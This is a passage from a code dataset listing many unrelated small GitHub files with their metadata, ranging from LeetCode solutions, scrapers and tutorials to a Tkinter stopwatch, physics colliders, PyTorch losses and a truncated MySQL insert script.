Preprocessor.post_process(g_img)\nprocessed_img.save('output.png')\n","repo_name":"yeaung276/NeuralStyleTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4225608621","text":"# https://leetcode.com/problems/bulls-and-cows/submissions/920154081/\n# Date of Submission: 2023-03-22\n\n# Runtime: 54 ms, faster than 20.63% of Python3 online submissions for Bulls and Cows.\n# Memory Usage: 13.7 MB, less than 98.8% of Python3 online submissions for Bulls and Cows.\n#\n# Problem:\n\n# You write down a secret number and ask your friend to guess what the number is .\n# When your friend makes a guess, you provide a hint with the following info:\n\n# The number of \"bulls\", which are digits in the guess that are in the correct position.\n# The number of \"cows\", which are digits in the guess that are in your secret number but\n# are located in the wrong position. Specifically, the non-bull digits in the guess that \n# could be rearranged such that they become bulls.\n# \n# Given the secret number secret and your friend's guess guess, \n# return the hint for your friend's guess.\n\n\nclass Solution:\n def getHint(self, secret: str, guess: str) -> str:\n bulls = 0\n cows = 0\n guess_dict = {}\n secret_dict = {}\n for i in range(0, len(secret)):\n if guess[i] == secret[i]:\n bulls += 1\n else:\n if secret[i] in guess_dict and guess_dict[secret[i]] > 0:\n cows += 1\n guess_dict[secret[i]] -= 1\n else:\n secret_dict[secret[i]] = secret_dict.get(secret[i], 0) + 1\n if guess[i] in secret_dict and secret_dict[guess[i]] > 0:\n cows += 1\n secret_dict[guess[i]] -= 1\n else:\n guess_dict[guess[i]] = guess_dict.get(guess[i], 0) + 1\n\n return str(bulls)+\"A\"+str(cows)+\"B\"\n","repo_name":"Retroflux/playground","sub_path":"LeetCodeSolutions/Python/0299-Bulls_and_Cows/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74714132252","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass Weather:\n @staticmethod\n def get_weather_today(city: str = \"санкт-петербург\") -> list:\n\n http = \"https://sinoptik.com.ru/погода-\" + city\n b = BeautifulSoup(requests.get(http).text, \"html.parser\")\n\n p3 = b.select('.temperature .p3')\n weather1 = p3[0].getText()\n p4 = b.select('.temperature .p4')\n weather2 = p4[0].getText()\n p5 = b.select('.temperature .p5')\n weather3 = p5[0].getText()\n p6 = b.select('.temperature .p6')\n weather4 = p6[0].getText()\n\n result = ''\n result = result + ('Утром :' + weather1 + ' ' + weather2) + '\\n'\n result = result + ('Днём :' + weather3 + ' ' + weather4) + '\\n'\n temp = b.select('.rSide .description')\n weather = temp[0].getText()\n result = result + weather.strip()\n\n return result\n","repo_name":"AppLoidx/VkLongPollBot","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"26476826031","text":"\"\"\"empty message\n\nRevision ID: a6f02c599c2f\nRevises: 898407c05fd3\nCreate Date: 2022-07-11 14:09:09.785226\n\n\"\"\"\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a6f02c599c2f'\ndown_revision = '898407c05fd3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_unique_constraint('uq_user_answer', 'FormAnswer', ['form_question_id', 'user_id'])\n\n\ndef downgrade():\n op.drop_constraint('form_answer_ibfk_1', 'FormAnswer', type_=\"foreignkey\")\n op.drop_constraint('form_answer_ibfk_2', 'FormAnswer', type_=\"foreignkey\")\n op.drop_constraint('uq_user_answer', 'FormAnswer', type_=\"unique\")\n op.create_foreign_key('form_answer_ibfk_1', 'FormAnswer', 'FormQuestion', ['form_question_id'], ['id'],\n ondelete='CASCADE')\n op.create_foreign_key('form_answer_ibfk_2', 'FormAnswer', 'User', ['user_id'], ['id'], ondelete='CASCADE')\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/migrations/versions/a6f02c599c2f_.py","file_name":"a6f02c599c2f_.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15047285119","text":"# CONDICIONALES\na = 5\nb = 6\nc = 8\n# Condiciones pueden ser evaluadas fuera del if\na_mayor_que_b = a > b \nprint(a_mayor_que_b)\n\n# Bloque estándar (las tabulaciones importan)\nif(a_mayor_que_b): # Igual que a > b\n if(a > c):\n print(f\"{a} es mayor\")\n else:\n print(f\"{c} es mayor\")\nelse:\n if(b > c):\n print(f\"{b} es mayor\")\n else:\n print(f\"{c} es mayor\")\n\n\n# Operador ternario (mayor = condicion?a:b)\ncondicion = a > b\nmayor = a if condicion else b \n\n# Solución anterior (aunque poco legible)\nmayor = a if a>b & a>c else b if b>a & b>c else c\nprint('Numero mayor:', mayor)\n\n\n# Bloque elif\nopcion = input('Ingresa una letra (A, B, C): ')\nopcion = opcion.upper()\n\nif(opcion == 'A'):\n print(\"Código de la opción A\")\nelif(opcion == 'B'):\n print(\"Código de la opción B\")\nelif(opcion == 'C'):\n print(\"Código de la opción B\")\nelse:\n print(\"Opción inválida\")\n\n\n","repo_name":"EstebanBrito/taller-basico-python","sub_path":"conditionals.py","file_name":"conditionals.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35167277308","text":"#эта прога преобразует скорости от 60 км в час до 130 км в час с приращение 10 км\n# в американские мили\nSTART_SPEED = 60 #начальная скорость\nEND_SPEED = 131 #конечная скорость\n\nINCREMENT = 10 #приращение скорости 10 км\n\nCONVERSION_FACTOR = 0.6214 #коэффициент пересчета\n\n#печатаем заголовки таьлицы\nprint('KPH\\tMPH') #kilometer per hour and miles per hour\nprint('----------------------------')\n\n#выводим скорости\nfor kph in range(START_SPEED, END_SPEED, INCREMENT):\n mph = kph * CONVERSION_FACTOR\n print(' ',kph, '\\t', format(mph, '.1f'))","repo_name":"NeoWhiteHatA/all_my_python","sub_path":"april/speed_converter.py","file_name":"speed_converter.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19047540899","text":"def sentiment_analysis(event, context):\n \"\"\"Responds to any HTTP request.\n Args:\n request (flask.Request): HTTP request object.\n Returns:\n The response text or any set of values that can be turned into a\n Response object using\n `make_response `.\n \"\"\"\n\n from google.cloud import language_v1\n from google.cloud import firestore\n import json\n\n\n def read_data_and_add_sentiment(collection):\n\n db = firestore.Client()\n\n emails_list = db.collection(u'{}'.format(collection)).get()\n for email in emails_list:\n sentiment, magnitude = analyze_sentiment(email.get('text'))\n message_id = email.id\n\n doc_ref = db.collection(u'{}'.format(collection)).document(u'{}'.format(message_id))\n doc_ref.update({\n u'sentiment': sentiment,\n u'magnitude': magnitude\n })\n \n \n\n def analyze_sentiment(text):\n # Instantiates a client\n client = language_v1.LanguageServiceClient()\n\n # The text to analyze\n document = language_v1.Document(content=text, type_=language_v1.Document.Type.PLAIN_TEXT)\n\n # Detects the sentiment of the text\n sentiment = client.analyze_sentiment(request={'document': document}).document_sentiment\n\n print(\"Text: {}\".format(text))\n print(\"Sentiment: {}, {}\".format(sentiment.score, sentiment.magnitude))\n\n return(sentiment.score, sentiment.magnitude)\n\n \n read_data_and_add_sentiment('emails')\n\n text = u\"Hello, world!\"\n score, magnitude = analyze_sentiment(text)\n\n return 'Score: ' + str(score) + ', Magnitude: ' + str(magnitude)\n","repo_name":"fleadsom/dbee","sub_path":"cloud_functions/sentiment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"12587783061","text":"\n#*Crie um programa que tenha uma FUNÇÃO chamada VOTO() que vai receber como PARÂMETRO o ANO DE NASCIMENTO de uma pessoa retornanda um valor LITERAL indicando se uma pessoa tem voto NEGADO, OPCIONAL ou OBRIGATÓRIA nas eleições.\n\ndef voto(ano):\n from datetime import date\n data = date.today().year\n idade = data - ano\n if idade <= 17:\n return(f'Com {idade} anos: VOTO NEGADO')\n else:\n if idade >= 18 and idade <= 64:\n return(f'Com {idade} anos: VOTO OBRIGATÓRIO')\n else:\n return(f'Com {idade} anos: VOTO OPCIONAL')\n\nano_nasc = int(input('Em qual ano você nasceu?: '))\nprint(voto(ano_nasc))\n","repo_name":"Werik10Souza/Desafios_em_python3","sub_path":"desafio101.py","file_name":"desafio101.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"20745079029","text":"import cv2\nimport numpy as np\n\n\ndef preprocess(img):\n \"\"\"\n Input: Original image\n Output: Gray-scale processed image\n \"\"\"\n # convert RGB to gray-scale\n if (np.array(img).shape[2] != 1):\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #Gassian blur\n blured = cv2.GaussianBlur(gray_img, (9,9), 0)\n #set a threshold\n thresh = cv2.adaptiveThreshold(blured, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n #invert so that the grid line and text are line, the rest is black\n inverted = cv2.bitwise_not(thresh, 0)\n morphy_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2,2))\n # Opening morphology to remove noise (while dot etc...)\n morph = cv2.morphologyEx(inverted, cv2.MORPH_OPEN, morphy_kernel)\n # dilate to increase border size\n result = cv2.dilate(morph, morphy_kernel, iterations=1)\n return result\n\n\nif __name__ == \"__main__\":\n img = \"testimg\\sudoku_real_4.jpeg\"\n img = cv2.imread(img)\n processed = preprocess(img)\n cv2.imshow(\"img\", cv2.resize(img, (600,600), cv2.INTER_AREA))\n cv2.waitKey(0)\n","repo_name":"LTPhat/Sudoku-Solver","sub_path":"threshold.py","file_name":"threshold.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29318402062","text":"# -*- coding:utf-8 -*-\n\nimport pandas as pd\n\ndf=pd.read_table('user_view.txt',seq=',',header=None,names=['user_id','shop_id','date'])\ndf.head()\n# df.sample(n=5)\n\ndf.sort_values(by='date',ascending=True)[:3]\ndf.sort_values(by='date',ascending=False)[:3]\n\ndf['days'] = df['date'].apply(lambda x:x[:10])\nnew_df = df[['user_id','shop_id','days']]\nnew_df.head()\n\n# count by days\npivot = new_df.pivot_table(index='days', columns='shop_id', aggfunc='count')\npivot = pivot.T\npivot.fillna(0,inplace=True)\npivot[list(column)] = pivot[list(column)].astype(float)\n#pivot.dtypes change to float type\npivot.head()\n\npivot.to_csv('user_view_days.csv',encoding='utf-8')\n","repo_name":"Wanghuaichen/Memo","sub_path":"大数据比赛代码/IJCAI/notafile.py","file_name":"notafile.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42270367565","text":"#Ejercicio Cronometro\r\n\"\"\"Integrantes: Maria Fernanda Uribe Hernandez - 20172020110\r\n Yeimer Serrano Navarro - 20181020060\r\n Juan David Rosero Torres - 20181020071\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter.font import Font\r\nimport time\r\n\r\nglobal continuar\r\ncontinuar=True\r\nglobal seg\r\nseg=0\r\nglobal mili\r\nmili=0\r\n\r\nclass interfaz:\r\n def iniciarCronometro(self):\r\n global continuar\r\n continuar=True\r\n self.tick()\r\n def detenerCronometro(self):\r\n global continuar\r\n continuar=False\r\n def reiniciarCronometro(self):\r\n global continuar\r\n continuar= False\r\n self.text.set(\"00:00:00:00\")\r\n global seg\r\n seg=0\r\n def tick(self):\r\n global continuar\r\n global seg\r\n if(continuar): \r\n global mili\r\n if(mili==10):\r\n seg +=1\r\n mili=0\r\n self.text.set(self.controlador.get(seg)+\":\"+str(mili))\r\n mili +=1\r\n if(continuar):\r\n self.root.after(95,self.tick)\r\n \r\n def __init__(self):\r\n self.controlador = Cronometro()\r\n self.root= Tk()\r\n self.root.title(\"Cronometro\") #Ponerle el nombre a la ventana\r\n self.root.geometry(\"350x100\")\r\n self.root.resizable(False,False)\r\n self.text = StringVar()\r\n self.text.set(\"00:00:00:00\")\r\n self.myFont =Font(family=\"Times New Roman\", size=18)\r\n self.etiqueta = Label(self.root,textvariable=self.text)\r\n self.etiqueta.pack()\r\n self.etiqueta.configure(font=self.myFont)\r\n self.btnReiniciar = Button(self.root,text=\"Reiniciar\",fg=\"Blue\",command= self.reiniciarCronometro).place(x=10,y=70,height=20,width=80) \r\n self.btnIniciar = Button(self.root,text=\"Iniciar\",fg=\"Green\",command= self.iniciarCronometro).place(x=130,y=70,height=20,width=80) \r\n self.btnParar = Button(self.root,text=\"Parar\",fg=\"red\",command= self.detenerCronometro).place(x=250,y=70,height=20,width=80) \r\n \r\n\r\nclass tiempo:\r\n def __init__(self,n):\r\n self.tiempo_seg=time.gmtime(n)\r\n \r\n\r\nclass horas(tiempo): \r\n def __init__(self,n):\r\n tiempo.__init__(self, n)\r\n self.get() \r\n def get(self):\r\n return (time.strftime(\"%H\",self.tiempo_seg ))\r\n \r\nclass minutos(tiempo): \r\n def __init__(self,n):\r\n tiempo.__init__(self, n)\r\n self.get()\r\n def get(self):\r\n return (time.strftime(\"%M\",self.tiempo_seg ))\r\n \r\nclass segundos(tiempo): \r\n def __init__(self,n):\r\n tiempo.__init__(self, n)\r\n self.get()\r\n def get(self):\r\n return (time.strftime(\"%S\",self.tiempo_seg ))\r\n \r\n \r\nclass Cronometro():\r\n def get(self,j):\r\n t=segundos(j)\r\n s= t.get()\r\n t=minutos(j)\r\n m= t.get()\r\n t=horas(j)\r\n h= t.get() \r\n self.aux=h+\":\"+m+\":\"+s\r\n return self.aux \r\n \r\n\r\nApp=interfaz()\r\nApp.root.mainloop() #Mantiene la ventana abierta\r\n","repo_name":"devFernandaUribe/Cronometro-con-interfaz","sub_path":"Cronometro.py","file_name":"Cronometro.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19465273779","text":"# 直接执行即可测试\n\n# 功能:快速定位复杂 js 代码中的函数部分的字符串\n# 因为代码很短,复制使用即可,按照测试的写法写即可。\n# 开发于 python3 ,是对已经存在库的内部函数的挂钩式处理后增加了自己想要的功能\n\n# 依赖, pip install pyjsparser\n# 如果你安装过了 js2py ,那么这个库就已经安装了。\n\nimport pyjsparser\n\nclass PyJsHooker:\n Identifier = 3 # pyjsparser.pyjsparserdata.Token.Identifier\n func_stack = []\n func_count = {}\n func_local = []\n def _expect_hook(self, value):\n index = len(PyJsHooker.func_stack)\n if self.lookahead['value'] == '{':\n if index not in PyJsHooker.func_count:\n PyJsHooker.func_count[index] = 1\n else:\n PyJsHooker.func_count[index] += 1\n if self.lookahead['value'] == '}':\n PyJsHooker.func_count[index] -= 1\n if index in PyJsHooker.func_count and PyJsHooker.func_count[index] == 0 and self.lookahead['value'] == '}':\n if PyJsHooker.func_stack:\n (name, start), end = PyJsHooker.func_stack.pop(), self.lookahead\n name = name['value'] if name['type'] == PyJsHooker.Identifier else '[Anonymous function]'\n PyJsHooker.func_local.append((name, start['start'], end['end']))\n return PyJsHooker._bak_expect(self, value)\n def _expectKeyword_hook(self, w):\n orFunc = self.lookahead\n isFunc = True if self.lookahead['value'] == 'function' else False\n r = PyJsHooker._bak_expectKeyword(self, w)\n crFunc = self.lookahead\n if isFunc:\n name = crFunc if crFunc['type'] == PyJsHooker.Identifier else None\n PyJsHooker.func_stack.append([crFunc, orFunc])\n return r\n _bak_expect = pyjsparser.PyJsParser.expect\n _bak_expectKeyword = pyjsparser.PyJsParser.expectKeyword\n pyjsparser.PyJsParser.expect = _expect_hook\n pyjsparser.PyJsParser.expectKeyword = _expectKeyword_hook\n def __init__(self):\n self.parser = pyjsparser.PyJsParser()\n\n def parse(self, script):\n PyJsHooker.func_stack = []\n PyJsHooker.func_count = {}\n PyJsHooker.func_local = []\n self.parser.parse(script)\n return PyJsHooker.func_local\n\n\nif __name__ == '__main__':\n script = '''// test_code\n function func(a,b){\n function ffff(){\n var sadf = \"12312{31}23\";\n var fffasdf = \"123123123\", aaa;\n var qqq = {\"123123\":123123};\n return 133;\n }\n\n (function(){\n console.log(ffff);\n })();\n\n return a+b;\n }\n\n var a = 123;'''\n s = PyJsHooker()\n\n for local in s.parse(script):\n name, start, end = local\n v = script[start:end]\n print('===================================')\n print('function name:{}, start:{}, end:{}'.format(name, start, end))\n print('-----------------------------------')\n print(v)","repo_name":"cilame/any-whim","sub_path":"处理js代码中定位function代码的部分.py","file_name":"处理js代码中定位function代码的部分.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"32"} +{"seq_id":"36681335651","text":"import matplotlib.pyplot as plt\nimport math as mat\ndef frange(start, stop=None, step=None):\n start = float(start)\n if stop == None:\n stop = start + 0.0\n start = 0.0\n if step == None:\n step = 1.0\n\n print(\"start = \", start, \"stop = \", stop, \"step = \", step)\n\n count = 0\n while True:\n temp = float(start + count * step)\n if step > 0 and temp >= stop:\n break\n elif step < 0 and temp <= stop:\n break\n yield temp\n count += 1\n\ndef parabola(vo,agl,x1,y1):\n X = []\n Y = []\n \n\n Sin = mat.sin(mat.radians(agl))\n Cos = mat.cos(mat.radians(agl))\n\n g = 9.8\n w = float((2 * vo * Sin) / g)\n\n atas = float(mat.pow(vo,2) * mat.pow(Sin,2))\n bawah = float(2*g)\n hMax = float(atas/bawah)\n R = vo * Cos * w\n g = g * -1\n\n posX = x1\n posY = y1\n\n voX = float(vo * Cos)\n voY = float(vo * Sin)\n\n\n\n X.append(posX)\n Y.append(posY)\n\n for t in frange(0,w+0.1,0.1):\n \n posX = voX * t\n X.append(posX)\n posY = vo * t * Sin + (0.5 * g * mat.pow(t,2))\n Y.append(posY)\n \n if posY < 0:\n print('Waktu Analitik ketika menyentuh tanah : ',t)\n print('Jarak Maksimal dari Analitik ',posX)\n print('\\n')\n break\n \n \n print('Waktu Total : ',w)\n plt.xlabel('Jarak')\n plt.ylabel('Ketinggian')\n plt.plot(X,Y)\n plt.xlim(0,R+1)\n plt.ylim(0,hMax+0.1)\n print ('Jarak Maksimum : ',R)\n print ('Tinggi Maksimum : ',hMax)\n plt.show()","repo_name":"Geofisika-UGM/2023-project-kelompok-11_powerranger","sub_path":"parabola.py","file_name":"parabola.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3185369477","text":"import torch\nimport torch.nn as nn\n\nclass ReConsLoss(nn.Module):\n def __init__(self, recons_loss, nb_joints, pose_alpha):\n super(ReConsLoss, self).__init__()\n \n if recons_loss == 'l1': \n self.Loss = torch.nn.L1Loss()\n elif recons_loss == 'l2' : \n self.Loss = torch.nn.MSELoss()\n elif recons_loss == 'l1_smooth' : \n self.Loss = torch.nn.SmoothL1Loss()\n \n self.nb_joints = None\n # 4 global motion associated to root\n # 12 local motion (3 local xyz, 3 vel xyz, 6 rot6d)\n # 3 global vel xyz\n # 4 foot contact\n if nb_joints is not None:\n self.nb_joints = nb_joints\n self.motion_dim = (nb_joints - 1) * 12 + 4 + 3 + 4\n else:\n self.jaw_alpha = 1.0\n self.pose_alpha = pose_alpha\n \n def forward(self, motion_pred, motion_gt) :\n if self.nb_joints is not None:\n loss = self.Loss(motion_pred[..., : self.motion_dim], motion_gt[..., :self.motion_dim])\n else:\n exp_loss = self.Loss(motion_pred[:,:,:50], motion_gt[:,:,:50])\n rot_loss = self.Loss(motion_pred[:,:,50:53], motion_gt[:,:,50:53])*self.pose_alpha\n jaw_loss = self.jaw_alpha * self.Loss(motion_pred[:,:,53:56], motion_gt[:,:,53:56])\n loss = exp_loss+rot_loss+jaw_loss\n return loss\n \n def forward_vel(self, motion_pred, motion_gt) :\n if self.nb_joints is None:\n vel_pred = torch.cat((\n torch.zeros_like(motion_pred[:,:1,:]),\n motion_pred[:,1:,:]-motion_pred[:,:-1,:]\n ), dim=1)\n vel_gt = torch.cat((\n torch.zeros_like(motion_gt[:,:1,:]),\n motion_gt[:,1:,:]-motion_gt[:,:-1,:]\n ), dim=1)\n loss = self.Loss(vel_pred, vel_gt)\n else:\n loss = self.Loss(motion_pred[..., 4 : (self.nb_joints - 1) * 3 + 4], motion_gt[..., 4 : (self.nb_joints - 1) * 3 + 4])\n return loss\n \n \n","repo_name":"sanjayss34/lm-listener","sub_path":"utils/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"32"} +{"seq_id":"70713303452","text":"import asyncio\nimport aiohttp\nimport aiofiles\n\nurls = {\n \"http://kr.shanghai-jiuxin.com/file/2020/1029/bf3b122b6e1ddd9777dadc6ca97b22e6.jpg\",\n \"http://kr.shanghai-jiuxin.com/file/2020/0316/1383df6982db26460d655d67c3dc4726.jpg\",\n \"http://kr.shanghai-jiuxin.com/file/2021/0429/3f381541926e01ece21fd210f59af6d2.jpg\"\n}\n\n\nasync def aiodownload(url):\n name = url.rsplit(\"/\", 1)[1]\n # aiohttp.ClientSession() <=> requests\n async with aiohttp.ClientSession() as session: # requests\n async with session.get(url) as resp: # resp=requests.get()\n async with aiofiles.open(name, mode=\"wb\") as f: # 写入文件\n await f.write(await resp.content.read()) # 读取内容是异步的,需要await\n\n\nasync def main():\n tasks = []\n for url in urls:\n tasks.append(aiodownload(url))\n\n await asyncio.wait(tasks)\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Andy-Lv/Python-Learning","sub_path":"爬虫/第4章/03_协程下载图片.py","file_name":"03_协程下载图片.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12588541729","text":"'''Program to print pattern below\n 1\n 12\n 123\n 1234\n 12345\nif (N=5) is given by user\nhere one loop of i is runing for row and one loop of j is running for column to print the value of j recursively '''\nN= int(input(\"input:\"))\nfor i in range(0,N+1):\n for j in range(1,i+1):\n print(j,end =\"\")\n print()\n","repo_name":"rajrahul1997/Code-Practice","sub_path":"pattern/pattern4.py","file_name":"pattern4.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26413280160","text":"from openpyxl.styles import Font, Border, Side, PatternFill, Alignment\nfrom openpyxl import load_workbook\n\nwb = load_workbook(\"rpa_test5.xlsx\")\nws = wb.active\n\n# 번호, 영어, 수학\na1 = ws['A1'] # 번호\nb1 = ws['B1'] # 영어\nc1 = ws[\"C1\"] # 수학\n\n# 셀 너비 지정\nws.column_dimensions['A'].width = 5\n\n# 셀 높이 지정\nws.row_dimensions[1].height = 50\n\n# 스타일 적용\n# 1. 폰트 적용: from openpyxl.styles import Font\na1.font = Font(color = \"FF0000\", italic = True, bold = True) # 색상 RGB 빨강, 이탤릭체 적용, 볼드 적용\nb1.font = Font(color = \"CC33FF\", name = \"Arial\", strike = True) # 색상 RGB CC33FF, 글꼴 Arial, 취소선(strike) 적용\nc1.font = Font(color = \"0000FF\", size = 20, underline=\"double\") # 색상 RGB 0000FF, 글자크기 20, 밑줄 double 적용(single / double 옵션)\n\n# 2. 테두리 적용: from openpyxl.styles import Border, Side\nthin_border = Border(left = Side(style = \"thin\"), right = Side(style = \"thin\"), top = Side(style = \"thin\"), bottom= Side(style = \"thin\"))\na1.border = thin_border\nb1.border = thin_border\nc1.border = thin_border\n\n# 3. 배경색 적용\n# 90점 넘는 셀에 대해서 초록색으로 적용\nfor row in ws.rows:\n for cell in row:\n\n# 4. cell 정렬: from openpyxl.styles import Alignment\n cell.alignment = Alignment(horizontal=\"center\", vertical= \"center\") # center, left, right, top, bottom\n if cell == 1: # A 번호 열은 제외\n continue\n \n if isinstance(cell.value, int) and cell.value > 90: # isinstance: cell의 값이 정수형이고 90 보다 높으면\n # from openpyxl.styles import PatternFill\n cell.fill = PatternFill(fgColor = \"00FF00\", fill_type= \"solid\") # 배경색 설정\n cell.font = Font(color=\"FF0000\") # 폰트 색상 변경\n\n# 5. 틀 고정\nws.freeze_panes = \"B2\" # B2기준으로 틀 고정\n\nwb.save(\"rpa_test5_style.xlsx\")","repo_name":"Choi-09/Python","sub_path":"python_projects/RPA/1_excel/11_cell_style.py","file_name":"11_cell_style.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18846442056","text":"from typing import List, Tuple, Union\nimport numpy as np\n\nfrom .Region import Region\nfrom .Utils import point_to_line_distance as p2l\n\n\nclass LinealCollider():\n \"\"\"Creates a lineal collider\n\n Args:\n X0 (UnionUnion[list, np.ndarray]): Initial point of collider\n XF (Union[list, np.ndarray]): End point of collider\n \"\"\"\n\n def __init__(self, X0: Union[list, np.ndarray], XF: Union[list, np.ndarray]) -> None:\n \"\"\"Creates a lineal collider\n\n Args:\n X0 (UnionUnion[list, np.ndarray]): Initial point of collider\n XF (Union[list, np.ndarray]): End point of collider\n \"\"\"\n X0 = np.array(X0)\n XF = np.array(XF)\n self.X0 = X0\n self.XF = XF\n self.delta = XF-X0\n self.l = np.linalg.norm(self.delta)\n self.n = np.array([-self.delta[1]/self.l, self.delta[0]/self.l])\n self.color = 'black'\n\n def callback(self, object: 'Node') -> None:\n \"\"\"Callback of the collider\n\n Args:\n object (Node): Node wich collide\n \"\"\"\n pass\n\n def draw(self, region: Region) -> None:\n \"\"\"Draws the lineal collider\n\n Args:\n region (Region): Drawing Region\n \"\"\"\n region.create_line(self.X0, self.XF, color=self.color, width=10)\n\n\nclass Wall(LinealCollider):\n \"\"\"Creates a Wall\n\n Args:\n x0 (List): Initial point of wall\n xf (List): End point of wall\n \"\"\"\n\n def __init__(self, x0: List, xf: List) -> None:\n \"\"\"Creates a Wall\n\n Args:\n x0 (List): Initial point of wall\n xf (List): End point of wall\n \"\"\"\n LinealCollider.__init__(self, x0, xf)\n self.color = 'blue'\n\n def callback(self, object: 'Node') -> None:\n \"\"\"Wall calback on collision detection\n\n Args:\n object (Node): Node wich collide\n \"\"\"\n d, dx = p2l(object.U, self.X0, self.XF)\n if d <= object.r:\n object.V -= 2*np.dot(object.V, dx)*dx/d/d*.95\n object.U += dx/d*(d-object.r)\n","repo_name":"ZibraMax/mass-body","sub_path":"pe/Colliders.py","file_name":"Colliders.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40743423857","text":"import sys\nsys.stdin = open('5102.txt', 'r')\n\ndef func(queue):\n\tglobal front, rear\n\tcount = 0\n\twhile front != rear:\n\t\tfront += 1\n\t\tx = queue[front]\n\t\tcount += 1\n\t\tfor i in range(V + 1):\n\t\t\tif matrix[x][i] == 1:\n\t\t\t\tqueue.append(i)\n\t\t\t\trear += 1\n\t\t\t\tmatrix[x][i] = 0\n\t\t\t\tif i == G:\n\t\t\t\t\treturn count\n\treturn 0\n\n\nT = int(input())\nfor tc in range(1, T+1):\n\tV, E = map(int, input().split())\n\tnode = [tuple(map(int, input().split())) for _ in range(E)]\n\tS, G = map(int, input().split()) # 출발, 도착지점\n\n\tmatrix = [[0]*(V+1) for _ in range(V+1)]\n\n\tfor n in node:\n\t\tmatrix[n[0]][n[1]] = 1\n\t\tmatrix[n[1]][n[0]] = 1\n\n\tfront = rear = -1\n\tqueue = []\n\n\tfor m in range(len(matrix)):\n\t\tif matrix[S][m] == 1:\n\t\t\tqueue.append(m)\n\t\t\trear += 1\n\t\t\tmatrix[S][m] = 0\n\n\tans = func(queue)\n\n\tprint('#%d %d' % (tc, ans))","repo_name":"soulgchoi/Algorithm","sub_path":"SWEA/5102 [SW 문제해결 기본] 노드의 거리.py","file_name":"5102 [SW 문제해결 기본] 노드의 거리.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29918594857","text":"\nclass ones_threes_nines:\n \n def __init__(self,n):\n d={9:0,3:0,1:0}\n for i in [9,3,1]:\n while n>=i:\n d[i]+=1\n n-=i\n self.answer = 'nines:{d[9]}, threes:{d[3]}, ones:{d[1]}'.format(d=d)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"8Fwv2f8My4kcNjMZh_4.py","file_name":"8Fwv2f8My4kcNjMZh_4.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40849711319","text":"import socketserver\r\nimport datetime\r\nimport base64\r\nimport numpy as np\r\nimport cv2\r\nimport imutils\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\nimport Main\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\n\r\ndef insertVariblesIntoTable(PlateNumber):\r\n try:\r\n connection=mysql.connector.connect(host='localhost',user='root',db='test')\r\n cursor=connection.cursor()\r\n SQL_insert_thing=\"INSERT INTO demotable665(PlateNumber)VALUES (%(carno)s)\"\r\n CarPlate={'carno':PlateNumber}\r\n print(CarPlate)\r\n cursor.execute(SQL_insert_thing,CarPlate)\r\n connection.commit()\r\n print(\"Thing inserted inside nicely\")\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed to insert \".format(error))\r\n\r\n 